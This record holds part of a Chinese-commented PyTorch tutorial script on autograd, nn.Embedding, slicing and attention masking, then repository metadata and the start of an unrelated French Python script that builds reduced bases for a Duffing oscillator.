None\n\n拓展到深度学习,从输入开始,每层都有大量参数W和b,这些参数也是Tensor结构。给Tensor设置了requires_grad=True后,PyTorch会跟踪Tensor之后的所有计算,经过.backward()后,PyTorch自动帮我们计算损失函数对于这些参数的梯度,梯度存储在了.grad属性里,PyTorch会按照梯度下降法更新参数。\n\n在PyTorch中,.backward()方法默认只会对计算图中的叶子节点求导。在上面的例子里,x就是叶子节点,y和z都是中间变量,他们的.grad属性都是None。而且,PyTorch目前只支持浮点数的求导。\n\n另外,PyTorch的自动求导一般只是标量对向量/矩阵求导。在深度学习中,最后的损失函数一般是一个标量值,是样本数据经过前向传播得到的损失值的和,而输入数据是一个向量或矩阵。在刚才的例子中,y是一个矩阵,.mean()对y求导,得到的是标量。\n\n\"\"\"\n\n#----------------------------------------------- 分割线 ----------------------------------------------\n\nimport torch\nfrom torch.autograd import Variable\n\nx = torch.Tensor([[1.,2.,3.],[4.,5.,6.]]) #grad_fn是None\nx = Variable(x, requires_grad=True)\ny = x + 2\nz = y*y*3\nout = z.mean()\n#x->y->z->out\nprint(f\"x = {x}\\n\")\nprint(f\"y = {y}\\n\")\nprint(f\"z = {z}\\n\")\nprint(f\"out = {out}\\n\")\n#反向传播 因为 out是一个纯量(scalar),out.backward() 等于out.backward(torch.tensor(1))。\nout.backward()\n\nprint(f\"x.grad = {x.grad}\\n\")\n\n\n#如果是z关于x求导就必须指定gradient参数:\nimport torch\nfrom torch.autograd import Variable\n\nx = torch.Tensor([[1.,2.,3.],[4.,5.,6.]]) #grad_fn是None\nx = Variable(x, requires_grad=True)\ny = x + 2\nz = y*y*3\nout = z.mean()\n#x->y->z->out\nprint(f\"x = {x}\\n\")\nprint(f\"y = {y}\\n\")\nprint(f\"z = {z}\\n\")\nprint(f\"out = {out}\\n\")\n\n#如果是z关于x求导就必须指定gradient参数:\n\ngradients = torch.Tensor([[2.,1.,1.],[3.,1.,1.]])\n\nz.backward(gradient=gradients)\n#若z不是一个标量,那么就先构造一个标量的值:L = torch.sum(z*gradient),再关于L对各个leaf Variable计算梯度\n#对x关于L求梯度\nprint(f\"x.grad = \\n{x.grad}\\n\")\n\n#结果:\n#tensor([[36., 24., 30.],\n# [36., 42., 48.]])\n\n#错误情况\n# z.backward()\n# print(x.grad)\n#报错:RuntimeError: grad can be implicitly created only for scalar outputs只能为标量创建隐式变量\n\n\n#----------------------------------------------- 分割线 ----------------------------------------------\n\"\"\"\nhttps://lulaoshi.info/machine-learning/neural-network/pytorch-tensor-autograd\n下面是一个使用PyTorch训练神经网络的例子。在这个例子中,我们随机初始化了输入x和输出y,分别作为模型的特征和要拟合的目标值。这个模型有两层,第一层是输入层,第二层为隐藏层,模型的前向传播如下所示:\n\nH=ReLU(W[1]X)\nY=W[2]H\n\"\"\"\n\n\nimport torch\n\ndtype = torch.float\ndevice = torch.device(\"cpu\") # 使用CPU\n# device = torch.device(\"cuda:0\") # 如果使用GPU,请打开注释\n\n# N: batch size\n# D_in: 输入维度\n# H: 隐藏层\n# D_out: 输出维度\nN, D_in, H, D_out = 64, 1000, 100, 10\n\n# 初始化随机数x, y\n# x, y用来模拟机器学习的输入和输出\nx = torch.randn(N, D_in, device=device, dtype=dtype)\ny = torch.randn(N, D_out, device=device, dtype=dtype)\n\n# 初始化模型的参数w1和w2\n# 均设置为 requires_grad=True\n# PyTorch会跟踪w1和w2上的计算,帮我们自动求导\nw1 = torch.randn(D_in, H, device=device, dtype=dtype, requires_grad=True)\nw2 = torch.randn(H, D_out, device=device, dtype=dtype, requires_grad=True)\n\nlearning_rate = 1e-6\nfor t in range(500):\n # 前向传播过程:\n # h1 = relu(x * w1)\n # y = h1 * w2\n y_pred = x.mm(w1).clamp(min=0).mm(w2)\n\n # 计算损失函数loss\n # loss是误差的平方和\n loss = (y_pred - y).pow(2).sum()\n if t % 100 == 99:\n print(t, loss.item())\n\n # 反向传播过程:\n # PyTorch会对设置了requires_grad=True的Tensor自动求导,本例中是w1和w2\n # 执行完backward()后,w1.grad 和 w2.grad 里存储着对于loss的梯度\n loss.backward()\n\n # 根据梯度,更新参数w1和w2\n with torch.no_grad():\n w1 -= learning_rate * w1.grad\n w2 -= learning_rate * w2.grad\n\n # 将 w1.grad 和 w2.grad 中的梯度设为零\n # PyTorch的backward()方法计算梯度会默认将本次计算的梯度与.grad中已有的梯度加和\n # 必须在下次反向传播前先将.grad中的梯度清零\n w1.grad.zero_()\n w2.grad.zero_()\n\n\n\n\n#=======================================================================================\n# pytorch nn.Embedding的用法和理解\n#=======================================================================================\n\"\"\"\nhttps://www.jianshu.com/p/63e7acc5e890\n\ntorch.nn.Embedding(num_embeddings, embedding_dim, padding_idx=None, max_norm=None, norm_type=2.0, scale_grad_by_freq=False, sparse=False, _weight=None)\n其为一个简单的存储固定大小的词典的嵌入向量的查找表,意思就是说,给一个编号,嵌入层就能返回这个编号对应的嵌入向量,嵌入向量反映了各个编号代表的符号之间的语义关系。\n\n输入为一个编号列表,输出为对应的符号嵌入向量列表。\n\n参数解释\nnum_embeddings (python:int) – 词典的大小尺寸,比如总共出现5000个词,那就输入5000。此时index为(0-4999)\nembedding_dim (python:int) – 嵌入向量的维度,即用多少维来表示一个符号。\npadding_idx (python:int, optional) – 填充id,比如,输入长度为100,但是每次的句子长度并不一样,后面就需要用统一的数字填充,而这里就是指定这个数字,这样,网络在遇到填充id时,就不会计算其与其它符号的相关性。(初始化为0)\nmax_norm (python:float, optional) – 最大范数,如果嵌入向量的范数超过了这个界限,就要进行再归一化。\nnorm_type (python:float, optional) – 指定利用什么范数计算,并用于对比max_norm,默认为2范数。\nscale_grad_by_freq (boolean, optional) – 根据单词在mini-batch中出现的频率,对梯度进行放缩。默认为False.\nsparse (bool, optional) – 若为True,则与权重矩阵相关的梯度转变为稀疏张量。\n\n\"\"\"\n\nbatch = [['i', 'am', 'a', 'boy', '.'], ['i', 'am', 'very', 'luck', '.'], ['how', 'are', 'you', '?']]\n#可见,每个句子的长度,即每个内层list的元素数为:5,5,4。这个长度也要记录。\nlens = [5,5,4]\n\nbatch = [[3,6,5,6,7],[6,4,7,9,5],[4,5,8,7]]\n\n#同时,每个句子结尾要加EOS,假设EOS在词典中的index是1。\nbatch = [[3,6,5,6,7,1],[6,4,7,9,5,1],[4,5,8,7,1]]\n\n\n#那么长度要更新:\nlens = [6,6,5]\n\n#很显然,这个mini-batch中的句子长度不一致!所以为了规整的处理,对长度不足的句子,进行填充。填充PAD假设序号是2,填充之后为:\nbatch = [[3,6,5,6,7,1],[6,4,7,9,5,1],[4,5,8,7,1,2]]\n\n\n#batch还要转成LongTensor:\n\nbatch=torch.LongTensor(batch)\nprint(f\"batch.shape = {batch.shape}\")\n#batch.shape = torch.Size([3, 6])\n\n#建立词向量层\nembed = torch.nn.Embedding(num_embeddings=20,embedding_dim=8)\n\n\n#好了,现在使用建立了的embedding直接通过batch取词向量了,如:\nembed_batch = embed(batch)\nprint(f\"embed_batch.shape = {embed_batch.shape}\")\n#embed_batch.shape = torch.Size([3, 6, 8])\nprint(f\"embed_batch = \\n{embed_batch}\")\n\n\n\n\n\n\n#=======================================================================================\nimport numpy as np\nimport torch\nimport torch.nn as nn\n# 2D\n# Input size表示这批有2个句子,每个句子由4个单词构成\nInput = torch.LongTensor([[1,2,4,5],[4,3,2,9]])\nprint(f\"Input = \\n{Input}\")\n\n# 构造一个(假装)vocab size=10,每个vocab用3-d向量表示的table\nembedding = nn.Embedding(num_embeddings=10, embedding_dim=3)\n# 可以看做每行是一个词汇的向量表示!\nprint(f\"embedding.weight = \\n{embedding.weight}\")\n\nOut = embedding(Input)\nprint(f\"Out = \\n{Out}\")\n\n#a=embedding(input)是去embedding.weight中取对应index的词向量!\n#看a的第一行,input处index=1,对应取出weight中index=1的那一行。其实就是按index取词向量!\nembedding = nn.Embedding(num_embeddings=10, embedding_dim=6)\nOut = embedding(Input)\nprint(f\"Out = \\n{Out},\\n Out.shape = {Out.shape}\")\n\n\nembedding = nn.Embedding(num_embeddings=10, embedding_dim=12)\nOut = embedding(Input)\nprint(f\"Out = \\n{Out},\\n Out.shape = {Out.shape}\")\n\n\nembedding = nn.Embedding(num_embeddings=5, embedding_dim=6) # num_embeddings必须大于input的最大元素值\nOut = embedding(Input)\nprint(f\"Out = \\n{Out},\\n Out.shape = {Out.shape}\")\n# IndexError: index out of range in self\n\n\n# 3D\nInput = torch.LongTensor([[[1,2,4,5],[4,3,2,9],[10,12,18,11]],[[1,2,4,5],[4,3,2,9],[22,21,18,20]]])\nprint(f\"Input = \\n{Input}\")\nprint(f\" Input.shape = {Input.shape}\")\nembedding = nn.Embedding(num_embeddings=30, embedding_dim=6) # num_embeddings必须大于input的最大元素值\nOut = embedding(Input)\nprint(f\"Out = \\n{Out},\\n Out.shape = {Out.shape}\")\n\n\n# 1D\nInput = torch.LongTensor([1,2,3,4])\nprint(f\"Input = \\n{Input}\")\nprint(f\" Input.shape = {Input.shape}\")\nembedding = nn.Embedding(num_embeddings=30, embedding_dim=6) # num_embeddings必须大于input的最大元素值\nOut = embedding(Input)\nprint(f\"Out = \\n{Out},\\n Out.shape = {Out.shape}\")\n\n# 2D\nInput = torch.LongTensor([1,2,3,4]).view(-1,1)\nprint(f\"Input = \\n{Input}\")\nprint(f\" Input.shape = {Input.shape}\")\nembedding = nn.Embedding(num_embeddings=30, embedding_dim=6) # num_embeddings必须大于input的最大元素值\nOut = embedding(Input)\nprint(f\"Out = \\n{Out},\\n Out.shape = {Out.shape}\")\n\n\n\nInput = torch.LongTensor([0.1,2.3,0.5,5.6]).view(-1,1) # input元素必须为整数,否则Embedding会将其转化为整数\nprint(f\"Input = \\n{Input}\")\nprint(f\" Input.shape = {Input.shape}\")\nembedding = nn.Embedding(num_embeddings=30, embedding_dim=6) # num_embeddings必须大于input的最大元素值\nOut = embedding(Input)\nprint(f\"Out = \\n{Out},\\n Out.shape = {Out.shape}\")\n\"\"\"\nInput =\ntensor([[0],\n [2],\n [0],\n [5]])\n Input.shape = torch.Size([4, 1])\nOut =\ntensor([[[ 1.9019, -0.8279, -0.4124, 0.4178, -0.0228, 0.5323]],\n\n [[-0.0520, 0.6144, -1.8603, -0.5358, 1.9237, 2.0032]],\n\n [[ 1.9019, -0.8279, -0.4124, 0.4178, -0.0228, 0.5323]],\n\n [[ 0.9151, -0.9837, 0.3220, 0.8575, -0.3587, 0.1849]]],\n grad_fn=),\n Out.shape = torch.Size([4, 1, 6])\n \"\"\"\n\n#==============================================================================\n# https://zhuanlan.zhihu.com/p/272844969\nembedding = nn.Embedding(5, 3) # 定义一个具有5个单词,维度为3的查询矩阵\nprint(embedding.weight) # 展示该矩阵的具体内容\ntest = torch.LongTensor([[0, 2, 0, 1],\n [1, 3, 4, 4]]) # 该test矩阵用于被embed,其size为[2, 4]\n# 其中的第一行为[0, 2, 0, 1],表示获取查询矩阵中ID为0, 2, 0, 1的查询向量\n# 可以在之后的test输出中与embed的输出进行比较\ntest = embedding(test)\nprint(test.size()) # 输出embed后test的size,为[2, 4, 3],增加\n# 的3,是因为查询向量的维度为3\nprint(test) # 输出embed后的test的内容\n\n\n\n\n\n#==================================Python中::(双冒号)的用法============================================\nprint(f\"list(range(10)[::2]) = {list(list(range(10)[::2]))}\")\n\nprint(f\"range(100)[5:18:2] = {list(range(100)[5:18:2])}\")\n\ns = range(20)\n\nprint(f\"s[::3] = {list(s[::3])}\")\n\n\nprint(f\"s[2::3] = {list(s[2::3])}\")\n\n\nprint(f\"s[:10:3] = {list(s[:10:3])}\")\n\n\nprint(f\"'123123123'[::3] = {'123123123'[::3]}\")\n\n\n# a[::-1]相当于 a[-1:-len(a)-1:-1],也就是从最后一个元素到第一个元素复制一遍。所以你看到一个倒序的东东。\n\nprint(f\"s[::-1] = {list(s[::-1])}\")\n\n\n\n\n\n\n#======================================== attention =============================================\na = torch.arange(96).reshape(2,4,12)\n\nb = a.view(2, -1, 2, 6)\n\nX = a.view(2, -1, 2, 6).transpose(1,2)\n\nC = X.transpose(-2, -1)\n\nB = torch.matmul(X, C)\n\nD = torch.matmul(B, X)\n\nprint(f\"a = a.shape = {a.shape} \\n{a}\\nb = b.shape = {b.shape} \\n{b} \\nX = X.shape = {X.shape} \\n{X}\\n\\\nC = C.shape = {C.shape}\\n {C}\\n B = B.shape = {B.shape} \\n{B}\\n D = D.shape = {D.shape} \\n{D}\\n\")\n\n\"\"\"\nX =\ntensor([[[[ 0, 1, 2, 3, 4, 5],\n [12, 13, 14, 15, 16, 17],\n [24, 25, 26, 27, 28, 29],\n [36, 37, 38, 39, 40, 41]],\n\n [[ 6, 7, 8, 9, 10, 11],\n [18, 19, 20, 21, 22, 23],\n [30, 31, 32, 33, 34, 35],\n [42, 43, 44, 45, 46, 47]]],\n\n\n [[[48, 49, 50, 51, 52, 53],\n [60, 61, 62, 63, 64, 65],\n [72, 73, 74, 75, 76, 77],\n [84, 85, 86, 87, 88, 89]],\n\n [[54, 55, 56, 57, 58, 59],\n [66, 67, 68, 69, 70, 71],\n [78, 79, 80, 81, 82, 83],\n [90, 91, 92, 93, 94, 95]]]])\nC =\ntensor([[[[ 0, 12, 24, 36],\n [ 1, 13, 25, 37],\n [ 2, 14, 26, 38],\n [ 3, 15, 27, 39],\n [ 4, 16, 28, 40],\n [ 5, 17, 29, 41]],\n\n [[ 6, 18, 30, 42],\n [ 7, 19, 31, 43],\n [ 8, 20, 32, 44],\n [ 9, 21, 33, 45],\n [10, 22, 34, 46],\n [11, 23, 35, 47]]],\n\n\n [[[48, 60, 72, 84],\n [49, 61, 73, 85],\n [50, 62, 74, 86],\n [51, 63, 75, 87],\n [52, 64, 76, 88],\n [53, 65, 77, 89]],\n\n [[54, 66, 78, 90],\n [55, 67, 79, 91],\n [56, 68, 80, 92],\n [57, 69, 81, 93],\n [58, 70, 82, 94],\n [59, 71, 83, 95]]]])\nB =\ntensor([[[[ 55, 235, 415, 595],\n [ 235, 1279, 2323, 3367],\n [ 415, 2323, 4231, 6139],\n [ 595, 3367, 6139, 8911]],\n\n [[ 451, 1063, 1675, 2287],\n [ 1063, 2539, 4015, 5491],\n [ 1675, 4015, 6355, 8695],\n [ 2287, 5491, 8695, 11899]]],\n\n\n [[[15319, 18955, 22591, 26227],\n [18955, 23455, 27955, 32455],\n [22591, 27955, 33319, 38683],\n [26227, 32455, 38683, 44911]],\n\n [[19171, 23239, 27307, 31375],\n [23239, 28171, 33103, 38035],\n [27307, 33103, 38899, 44695],\n [31375, 38035, 44695, 51355]]]])\nD =\ntensor([[[[ 34200, 35500, 36800, 38100, 39400, 40700],\n [ 192312, 199516, 206720, 213924, 221128, 228332],\n [ 350424, 363532, 376640, 389748, 402856, 415964],\n [ 508536, 527548, 546560, 565572, 584584, 603596]],\n\n [[ 168144, 173620, 179096, 184572, 190048, 195524],\n [ 403152, 416260, 429368, 442476, 455584, 468692],\n [ 638160, 658900, 679640, 700380, 721120, 741860],\n [ 873168, 901540, 929912, 958284, 986656, 1015028]]],\n\n\n [[[ 5702232, 5785324, 5868416, 5951508, 6034600, 6117692],\n [ 7056120, 7158940, 7261760, 7364580, 7467400, 7570220],\n [ 8410008, 8532556, 8655104, 8777652, 8900200, 9022748],\n [ 9763896, 9906172, 10048448, 10190724, 10333000, 10475276]],\n\n [[ 7522704, 7623796, 7724888, 7825980, 7927072, 8028164],\n [ 9119376, 9241924, 9364472, 9487020, 9609568, 9732116],\n [10716048, 10860052, 11004056, 11148060, 11292064, 11436068],\n [12312720, 12478180, 12643640, 12809100, 12974560, 13140020]]]])\n.shape =\ntorch.Size([2, 4, 12])\nb.shape =\ntorch.Size([2, 4, 2, 6])\nX.shape =\ntorch.Size([2, 2, 4, 6])\nC.shape =\ntorch.Size([2, 2, 6, 4])\nB.shape =\ntorch.Size([2, 2, 4, 4])\nD.shape =\ntorch.Size([2, 2, 4, 6])\n\"\"\"\n\n\n#=====================================attention QKV================================================\na = torch.arange(60).reshape(3, 5, 4) # batch, target_len, feats\nb = torch.arange(72).reshape(3, 6, 4) # batch, seq_len, feats\nc = torch.arange(144).reshape(3, 6, 8) # batch, seq_len, val_feats\n\nd = torch.matmul(a, b.transpose(-2, -1))\n\ne = torch.matmul(d, c)\nprint(f\"a = \\n{a}\\nb = \\n{b}\\nc = \\n{c}\\nd = \\n{d}\\ne = \\n{e}\\n\")\n\nprint(f\"a.shape = \\n{a.shape}\\nb.shape = \\n{b.shape}\\nc.shape = \\n{c.shape}\\nd.shape = \\n{d.shape}\\ne.shape = \\n{e.shape}\\n\")\n\n\n\n\n\n\n#=========================================展示mask的过程 mask() =============================================\nimport torch\nimport math\n\n\n\nq = torch.Tensor([np.random.random(10),np.random.random(10),np.random.random(10), np.random.random(10), np.zeros((10,1)), np.zeros((10,1))])\nk = torch.Tensor([np.random.random(10),np.random.random(10),np.random.random(10), np.random.random(10), np.zeros((10,1)), np.zeros((10,1))])\nscores = torch.matmul(q, k.transpose(0,1)) / math.sqrt(10)\nmask = torch.Tensor([1,1,1,1,0,0])\nmask1 = mask.unsqueeze(1)\nscores1 = scores.masked_fill(mask1==0, -np.inf)\n\n\n\nmas = torch.from_numpy( np.triu(np.ones((6,6)), k=1),).byte()\nscores2 = scores.masked_fill(mas==0, -np.inf)\n\n\n\n\n\n\"\"\"\n5. masked_fill_(mask, value)方法\n\n其中mask是张量,元素是布尔值, value是要填充的值。该方法会在mask中为True的位置上填充value值。mask和value的形状要么是相同的, 要么是可以进行广播的, 否则会报错。\n\"\"\"\n#=========================================展示mask的过程 mask() =============================================\n# https://codeantenna.com/a/SqCLQ4AQNN\nimport torch\na=torch.tensor([[[5,5,5,5], [6,6,6,6], [7,7,7,7]], [[1,1,1,1],[2,2,2,2],[3,3,3,3]]])\nprint(f\"a = {a}\")\n\"\"\"\ntensor([[[5, 5, 5, 5],\n [6, 6, 6, 6],\n [7, 7, 7, 7]],\n\n [[1, 1, 1, 1],\n [2, 2, 2, 2],\n [3, 3, 3, 3]]])\n\"\"\"\nprint(a.size())\n#torch.Size([2, 3, 4])\n\n#############################################3\nmask = torch.ByteTensor([[[1],[1],[0]],[[0],[1],[1]]])\nprint(f\"mask.size() = {mask.size()}\")\n#torch.Size([2, 3, 1])\nb = a.masked_fill(mask, value=torch.tensor(-1e9))\nprint(f\"b1 = {b}\")\n\n\n\n\n\n#可以看到a和mask的shape对应分别是 2 3 4 对应 2 3 1 ,可以看到mask为中的第一个1,使得a的第一行全部被mask掉了,那么我把mask的shape改成2 3 4 ,是不是可以指定位置mask掉呢\nmask1 = torch.ByteTensor([[[1,1,0,0],[1,0,0,0],[0,0,0,0]],[[0,0,0,0],[1,1,1,1],[1,1,1,1]]])\nb = a.masked_fill(mask1, value=torch.tensor(-1e9))\n\n\n#的确可以,好的,如果shape相同,那就是对应位置被mask掉,\n#那么现在,我把mask的shape改成1,3,4 a保持为 2 ,3 ,4 会不会对于a的最外层的两个维度进行一样的mask呢?\n\nmask = torch.ByteTensor([[[1,1,0,0],[1,0,0,0],[0,0,0,0]]])\nb1 = a.masked_fill(mask, value=torch.tensor(-1e9))\nprint(f\"b = {b1}\")\n\"\"\"\ntensor([[[-1000000000, -1000000000, 5, 5],\n [-1000000000, 6, 6, 6],\n [ 7, 7, 7, 7]],\n\n [[-1000000000, -1000000000, 1, 1],\n [-1000000000, 2, 2, 2],\n [ 3, 3, 3, 3]]])\n\"\"\"\nprint(f\"a.shape() = {a.shape()}\")\n\n#的确是这样的,最外层的两个维度进行了相同的mask\n#那么再改一改,mask改成1,1,4,这样是不是行a都会被相同的mask掉\nmask = torch.ByteTensor([[[1,1,0,0]]])\nb = a.masked_fill(mask, value=torch.tensor(-1e9))\nprint(f\"b = {b}\")\n\"\"\"\ntensor([[[-1000000000, -1000000000, 5, 5],\n [-1000000000, -1000000000, 6, 6],\n [-1000000000, -1000000000, 7, 7]],\n\n [[-1000000000, -1000000000, 1, 1],\n [-1000000000, -1000000000, 2, 2],\n [-1000000000, -1000000000, 3, 3]]])\n\"\"\"\n\n\n\n\nimport torch\n\nmask = torch.randint(0, 2, (3, 1)).bool()\ntarget = torch.randn(3, 2)\nprint(target)\n# tensor([[-0.4297, 0.6459],\n# [ 1.2334, -1.5065],\n# [ 0.1295, 0.2587]])\n\nprint(mask)\n# tensor([[False],\n# [False],\n# [ True]])\n\n# 注意mask和target是可以广播的\ntarget.masked_fill_(mask, -100)\nprint(target)\n# tensor([[-100.0000, -100.0000],\n# [ -100.0000, -100.0000],\n# [-1.0000, -1.0000]])\n# 如果执行target.masked_fill(mask, -1), 是非in_place操作, 那么target本身的值不会改变\n\n\n\nimport torch\nimport torch.nn as nn\na = torch.randint(0, 255, (2, 3, 3))\nprint(f\"a = {a}\")\nmask = torch.tensor([[1, 0, 0], [0, 1, 0], [0, 0, 1]]).bool()\nprint(f\"mask = {mask}\")\na.masked_fill_(~mask, 0)\nprint(f\"a = {a}\")\n\n\n# 当然, 你也可以自己手动mask\na = torch.tensor([[1,2,3], [2,1,0]])\nmodel = nn.Embedding(num_embeddings = 10, embedding_dim = 6)\nb = model(a)\nmask = (a!=0).float().unsqueeze(-1)\nresult = b * mask\n\n\n\n# 当然, 你也可以自己手动mask\n# attn_output = self.mha(x, x, x, mask)\n# x.shape=(128,31,d_model=128), mask.shape = torch.Size([128, 1, 31])\n# Q*K = (128,8,31,31) mask = (128,1,1,31)\na = torch.arange(48).reshape(2,2,3,4)\nmasK = torch.randint(0,2,(2,1,1,4))\nb = a+masK*(-1e9)\n\n\n# attn_output = self.mha(x, x, x, mask)\n# x.shape = torch.Size(128, 30,128), tgt_mask.shape = torch.Size([128, 30, 30])\n# Q*K = (128,8,30,30) mask = (128,1,30,30)\na = torch.arange(3*2*4*4).reshape(3,2,4,4)\nmasK = torch.randint(0,2,(3,1,4,4))\nb = a+masK*(-1e9)\n\n\n\na = torch.arange(3*2*4*4).reshape(3,2,4,4)\nmasK = torch.randint(0,2,(3,1,1,4))\nb = a+masK*(-1e9)\n\n\n\n# attn_output = self.src_mha(x, memory, memory, src_mask) # q, k, v\n# x.shape = torch.Size(128, 30,128),src_mask.shape = torch.Size([128, 1, 31])\n# Q*K = (128,8,30,31) mask = (128,1,1,31)\na = torch.arange(3*2*3*4).reshape(3,2,3,4)\nmasK = torch.randint(0,2,(3,1,1,4))\nb = a+masK*(-1e9)\n\n\n\n\n\n#========================== 展示mask叠加的过程============================================\n\nseq_len = 5 # 30\nbatchsize = 3 #128\npad = 0\n\n\n\ntgt = torch.randint(1, 10, (batchsize, seq_len))\ntgt[-1,-4:] = 0\ntgt[-2,-3:] = 0\ntgt[-3,-1:] = 0\n\ntgt_mask = (tgt != pad).unsqueeze(-2).type(torch.uint8)\nprint(f\"tgt_mask.shape = {tgt_mask.shape}\")\nprint(f\"tgt_mask = \\n{tgt_mask}\")\n\n\nattn_shape = (1, seq_len, seq_len)\nsub_mask = torch.from_numpy(np.triu(np.ones(attn_shape), k=1) .astype('uint8'))==0\nsub_mask = sub_mask.type(torch.uint8)\nprint(f\"sub_mask = \\n{sub_mask}\")\n\n\ntgt_mask = tgt_mask & sub_mask\nprint(f\"tgt_mask.shape = {tgt_mask.shape}\")\nprint(f\"tgt_mask = {tgt_mask}\")\n\n\n\n#============================================================================\ndef subsequent_mask(size):\n \"Mask out subsequent positions.\"\n ##生成向后遮掩的掩码张量,参数size是掩码张量最后两个维度的大小,它最后两维形成一个方阵\n attn_shape = (1, size, size)\n #然后使用np.ones方法向这个形状中添加1元素,形成上三角阵(k=1)\n subsequent_mask = np.triu(np.ones(attn_shape), k=1).astype('uint8')\n return torch.from_numpy(subsequent_mask)\n\n\ntrg = torch.randint(1, 10, (batchsize, seq_len))\ntrg[-1,-4:] = 0\ntrg[-2,-3:] = 0\ntrg[-3,-1:] = 0\ntrg_mask = (trg == pad ).unsqueeze(-2).type(torch.FloatTensor) # [batch, 1, seq_len] torch.Size([128, 1, 30])\nprint(f\"trg_mask = \\n{trg_mask}\")\n\n\nlook_ahead_mask = subsequent_mask(trg.size(-1)).type_as(trg_mask.data)# torch.Size([1, 30, 30])\nprint(f\"look_ahead_mask = \\n{look_ahead_mask}\")\n\n# 将 pad 产生的 mask,和序列一次预测下一个单词产生的 mask 结合起来\ncombined_mask = torch.max(trg_mask, look_ahead_mask) # torch.Size([128, 30, 30])\nprint(f\"combined_mask = \\n{combined_mask}\")\n\n\n\n\na = torch.arange(24).reshape(2,3,4)\n# tensor([[[ 0, 1, 2, 3],\n# [ 4, 5, 6, 7],\n# [ 8, 9, 10, 11]],\n\n# [[12, 13, 14, 15],\n# [16, 17, 18, 19],\n# [20, 21, 22, 23]]])\n\n\nprint(f\"a[:,-1] = {a[:,-1]}\")\n# tensor([[ 8, 9, 10, 11],\n# [20, 21, 22, 23]])\n\n\nprint(f\"a[:,-1,:-1] = {a[:,-1,:-1]}\")\n# tensor([[ 8, 9, 10],\n# [20, 21, 22]])\n\n\nprint(f\"a[:,-1,-1] = {a[:,-1,-1]}\")\n# tensor([11, 23])\n","repo_name":"junjiecjj/Python","sub_path":"PytorchTutor/Pytorch/pytorch_tutor.py","file_name":"pytorch_tutor.py","file_ext":"py","file_size_in_byte":43584,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22859292703","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom scipy.integrate import odeint\nfrom random import *\nimport sys\n\n\n###################################################################################################################################################\n################################################## PROGRAMME PRINCIPALE ##########################################################################\n###################################################################################################################################################\n\ndef main_oscillateur():\n\n print(\"-------------------------------------------------------------------\")\n print(\"--------------------- DEBUT DU PROGRAMME --------------------------\")\n print(\"-------------------------------------------------------------------\")\n\n #------------------------ DESCRIPTION DES PARAMETRES -----------------------\n\n #DISCRETISATION TEMPORELLE\n print(\"------------ Conditions initiales ------------------\")\n tmax = 50\n print(\"tmax = \",tmax)\n t = np.arange(0,tmax+1)\n\n #CONDITIONS INITIALES DU SYSTEME\n x0 = 0.\n print(\"x0 = \",x0)\n xdot0 = 0.\n print(\"xdot0 = \", xdot0)\n Z = [x0,xdot0]\n print(\"Vecteur des conditions initiales = \", Z)\n print(\"----------------------------------------------------\")\n\n #PARAMETRES FIXES \"UNE BONNE FOIS POUR TOUTE\"\n print(\"-------- Paramètres définis pour le programme ------\")\n delta = 0.02\n print(\"delta = \", delta)\n beta = 5\n print(\"beta = \", beta)\n omega = 0.5\n print(\"omega = \", omega)\n print(\"----------------------------------------------------\")\n\n #PARAMETRES SUR LESQUELS ON JOUE\n alpha = np.linspace(1,3,21)\n print(\"alpha = \", alpha)\n gamma_1 = 1\n print(\"gamma_1 = \", gamma_1)\n gamma_2 = 3.5\n print(\"gamma_2 = \", gamma_2)\n\n #NOMBRE DE VECTEUR DE LA BASE CONSIDERE\n k = 5\n print(\"Nombre de vecteur de la base = \", k)\n\n #sol = solu_oscillateur(Z,t,delta,beta,omega,1,gamma_1)\n\n #-------------------------- INITIALISATION DES BASES -----------------------\n #PSY_INIT = BASE POUR GAMMA 1\n PSY_INIT = base_gamma(Z,t,delta,beta,omega,alpha,gamma_1)\n #PHI_INIT = BASE POUR GAMMA 2\n PHI_INIT = base_gamma(Z,t,delta,beta,omega,alpha,gamma_2)\n print(\"La taille de PSY_INIT est = \", np.shape(PSY_INIT))\n print(\"La taille de PHI_INIT est = \", np.shape(PHI_INIT))\n\n #------------------------- ON REDUIT ORTHOGONALISE LA BASE -----------------\n print(\"-----------Quelques calculs sur les dimensions ------\")\n\n PSY_ORTHO = orthonormalisation(PSY_INIT,k)\n PHI_ORTHO = orthonormalisation(PHI_INIT,k)\n #PSY_ORTHO = gram_schmidt(PSY_INIT)\n #PHI_ORTHO = gram_schmidt(PHI_INIT)\n print(\"La taille de PSY_ORTHO est = \", np.shape(PSY_ORTHO))\n print(\"La taille de PHI_ORTHO est = \", np.shape(PHI_ORTHO))\n\n #----------------------- FAIRE INTERPOLATION A t = 0.5 AVEC GEODESIQUE ------\n\n INTERPOL = solution_val_lim(PSY_ORTHO,PHI_ORTHO,0.5)\n gamma_mid = (gamma_1 + gamma_2)/2\n print(\"gamma_mid = \", gamma_mid)\n\n #----------------------- ON REGARDE LA SOLUTION GROSSIERE MOYENNE ----------\n\n GROSSIERE = (PHI_INIT + PSY_INIT)/2\n\n #---------------------- CALCUL D'ERREUR SUR LA SOLUTION --------------------\n print(\"-------------------Les calculs d'erreur --------------\")\n\n erreur_PSY = erreur_moy_HF(PSY_ORTHO,Z,t,delta,beta,omega,alpha,gamma_1)\n erreur_PHI = erreur_moy_HF(PHI_ORTHO,Z,t,delta,beta,omega,alpha,gamma_2)\n\n print(\"L'erreur moyenne sur tous les alphas entre la solution exacte et la solution projetée sur la base réduite PSY est, pour gamma_1 : \", erreur_PSY)\n print(\"L'erreur moyenne sur tous les alphas entre la solution exacte et la solution projetée sur la base réduite PHI est, pour gamma_2 : \", erreur_PHI)\n\n erreur_INTERPOL = erreur_moy_HF(INTERPOL,Z,t,delta,beta,omega,alpha,gamma_mid)\n print(\"L'erreur moyenne sur tous les alphas entre la solution exacte et la solution projetée sur la base INTERPOLE est, pour gamma_mid : \", erreur_INTERPOL)\n\n erreur_GROSSIERE = erreur_moy_HF(GROSSIERE,Z,t,delta,beta,omega,alpha,gamma_mid)\n print(\"L'erreur moyenne sur tous les alphas entre la solution exacte et la solution projetée sur la base GROSSIERE est, pour gamma_mid : \", erreur_GROSSIERE)\n\n print(\"------------------------------------------------------\")\n\n print(\"-------------------------------------------------------------------\")\n print(\"--------------------- FIN DU PROGRAMME ----------------------------\")\n print(\"-------------------------------------------------------------------\")\n\n return PSY_INIT, PHI_INIT\n\n\n###################################################################################################################################################\n################################################## 